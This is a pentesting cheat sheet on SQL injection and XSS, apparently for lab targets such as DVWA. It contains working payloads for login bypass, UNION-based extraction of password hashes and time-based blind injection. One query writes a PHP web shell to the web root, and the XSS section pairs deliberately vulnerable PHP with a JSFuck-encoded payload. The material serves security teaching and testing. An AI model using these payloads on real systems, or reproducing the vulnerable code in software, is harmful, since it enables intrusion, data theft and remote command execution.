# SQL Injection & XSS Playground

### Classic SQL Injection

## SQL injection overview

### What is it?

SQL injection is where an attacker is able to manipulate database queries made by an application.

**A simple example**

* A vulnerable web application has the endpoint `/search?product={productName}`
* When a request is made, the application uses SQL to search for the product `SELECT * FROM products WHERE name=$productName`
* If an attacker inserts a payload into `{productName}` such as `anything' UNION SELECT password FROM users WHERE username = 'admin` that modifies the query, sensitive data could be leaked.
* The vulnerable application sends this query to the database and the database returns the admin's password.

It's important to note that a payload or attack may change depending on the application, the query, and the database. SQL injection can often lead to:

* Sensitive data exposure
* Data manipulation
* Remote code execution
* Denial of service

**Other learning resources:**

* PostSwigger: <https://portswigger.net/web-security/sql-injection>
* Swisskeyrepo: <https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection>

**Writeups:**

* <https://infosecwriteups.com/how-i-found-multiple-sql-injections-in-5-minutes-in-bug-bounty-40155964c498>

*Have a good writeup & want to share it here? Drop me a message on LinkedIn.*

### Checklist

* [ ] What is the technology stack you're attacking?
  * [ ] What application/framework is being used
  * [ ] What backend DB is being used
  * [ ] Is there an ORM?
* [ ] Verify injection points
  * [ ] URL parameters
  * [ ] Form fields
  * [ ] HTTP headers (e.g. cookies, etc)
  * [ ] Out-of-band (e.g. data retrieved from a third party)
* [ ] Test ' and "
  * [ ] Can you trigger an error?
  * [ ] Can you trigger a different response?
* [ ] Test with SQLmap
* [ ] Test for login bypass `' and 1=1-- -` etc
* [ ] Test for blind SQLi
  * [ ] Test for errors
  * [ ] Test for conditional responses
  * [ ] Test for conditional errors
  * [ ] Test for time delays
* [ ] Test for out-of-band interactions
* [ ] Test for NoSQL injection
* [ ] Is there a blocklist?
  * [ ] Can you bypass the blocklist?
    * [ ] Encoding
    * [ ] Double encoding
    * [ ] Alternative characters
    * [ ] Alternative payloads
* [ ] Test for second-order SQLi

### Exploitation

```sql
# Basic login bypass
' AND 1=1#
```

```sql
# UNION SELECT
' UNION SELECT null,null FROM users-- -
```

```sql
# Blind
' AND SUBSTR((SELECT version()),1,1)='7'#
CAST((SELECT example_column FROM example_table) AS int)
```

## SQL Injection & XSS Playground

### Classic SQL Injection

#### Union Select Data Extraction

```sql
mysql> select * from users where user_id = 1 order by 7;              
ERROR 1054 (42S22): Unknown column '7' in 'order clause'
mysql> select * from users where user_id = 1 order by 6;
mysql> select * from users where user_id = 1 union select 1,2,3,4,5,6;
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRXMXXwrtfQQjcZ6RBe%2F-LRXObGwHxUJnP-M3Zl2%2FScreenshot%20from%202018-11-17%2015-59-39.png?alt=media\&token=3642479d-9032-4ec4-9a2e-8954f730bd60)

```sql
select * from users where user_id = 1 union all select 1,(select group_concat(user,0x3a,password) from users),3,4,5,6;
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRXMXXwrtfQQjcZ6RBe%2F-LRXPNBj8tvkuD7S8spf%2FScreenshot%20from%202018-11-17%2016-03-00.png?alt=media\&token=344cf668-8e94-4874-b521-2dba54f6e8bb)

#### Authentication Bypass

```sql
mysql> select * from users where user='admin' and password='blah' or 1 # 5f4dcc3b5aa765d61d8327deb882cf99' 
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRXSBkbwqRz60W4Qw8c%2F-LRXSM-wLpz-MR1pTltH%2FScreenshot%20from%202018-11-17%2016-16-06.png?alt=media\&token=70577172-2ffb-4fde-a4d6-28628de694cc)

#### Second Order Injection

```sql
mysql> insert into accounts (username, password, mysignature) values ('admin','mynewpass',(select user())) # 'mynewsignature');
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRXaBImaVskSspe9-Y9%2F-LRXapQ0X8Rl4huvnU0n%2FScreenshot%20from%202018-11-17%2016-57-24.png?alt=media\&token=925e11de-f4a2-4c69-974b-4a55ea2b503e)

#### Dropping a Backdoor

```sql
mysql> select * from users where user_id = 1 union select all 1,2,3,4,"<?php system($_REQUEST['c']);?>",6 into outfile "/var/www/dvwa/shell.php" #;
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRXcY0UNCY2LUUtyXcW%2F-LRY5MXbUi_kecGjQCHt%2FScreenshot%20from%202018-11-17%2019-15-16.png?alt=media\&token=9dc016e9-8bc7-4659-9f1a-e8d636fbc448)

#### Conditional Select

```sql
mysql> select * from users where user = (select concat((select if(1>0,'adm','b')),"in"));
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRckivms3V24LOmHitj%2F-LRcl3lcp24HXsErO5wT%2FScreenshot%20from%202018-11-18%2021-39-53.png?alt=media\&token=1df11d39-1fce-4495-aadf-0f3f8a9c5bf8)

#### Bypassing Whitespace Filtering

```sql
mysql> select * from users where user_id = 1/**/union/**/select/**/all/**/1,2,3,4,5,6;
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRi850Fb4bWMb2XGxnO%2F-LRi8FAL79mB9k-5SKZ9%2FScreenshot%20from%202018-11-19%2022-43-46.png?alt=media\&token=58bbeb4d-b844-4fa5-a7df-9128c0383e18)

### Time Based SQL Injection

#### Sleep Invokation

```sql
mysql> select * from users where user_id = 1 or (select sleep(1)+1);
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRXMXXwrtfQQjcZ6RBe%2F-LRXMoyg7m2ypz2wckU2%2FScreenshot%20from%202018-11-17%2015-51-50.png?alt=media\&token=86e07c05-3739-4e82-8351-96ed92c53697)

```sql
select * from users where user_id = 1 union select 1,2,3,4,5,sleep(1);
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRXMXXwrtfQQjcZ6RBe%2F-LRXNFPExWv3xXXjtPtr%2FScreenshot%20from%202018-11-17%2015-53-52.png?alt=media\&token=4a9ea4d6-187d-46fa-9a64-1331edcd14b6)

```
```

### XSS

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRYJh0E49lb4ekM05MZ%2F-LRYJsNvY3OOrKKiWrsJ%2FPeek%202018-11-17%2020-17.gif?alt=media\&token=3f2d801c-74f2-4747-ac6d-b854697568e1)

#### Strtoupper Bypass

Say we have the following PHP code that takes `name` as a user supplied parameter:

```php
<?php
        $input=$_GET['name'];
        $sanitized=strtoupper(htmlspecialchars($input));   
        echo '<form action="">';
        echo "First name: <input type='text' name='name' value='".$sanitized."'><br>";
        echo "<input type='submit' value='Submit form'></form>";
        echo "</HTML></body>";
?>
```

Line 3 is vulnerable to XSS, and we can break out of the input with a single quote `'`:

```php
$sanitized=strtoupper(htmlspecialchars($input));   
```

For example, if we set the `name` parameter to the value of `a'`, we get:

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRYLWj41O7lB0E_1zMZ%2F-LRYemANzw2Zq24HrHJy%2FScreenshot%20from%202018-11-17%2021-54-22.png?alt=media\&token=8fe26e72-7cac-44a2-9a0b-aec9fa4d5bb9)

Note that the `a` got converted to a capital `A` and this is due to the `strtoupper` function being called on our input. What this means is that any ascii letters in our JavaScript payload will get converted to uppercase and become invalid and will not execute (i.e`alert() != ALERT()`).

To bypass this constraint, we can encode our payload using JsFuck, which eliminates all the letters from the payload and leaves us with this:

```php
A' onmouseover='[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()'
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LRYLWj41O7lB0E_1zMZ%2F-LRYf25HeqCaNyOBRCZt%2FScreenshot%20from%202018-11-17%2021-55-33.png?alt=media\&token=7eaf6946-6659-4d8b-ab06-4231d7ca8059)

### References

{% embed url="<http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet>" %}

{% embed url="<https://www.youtube.com/watch?v=Rqt_BgG5YyI>" %}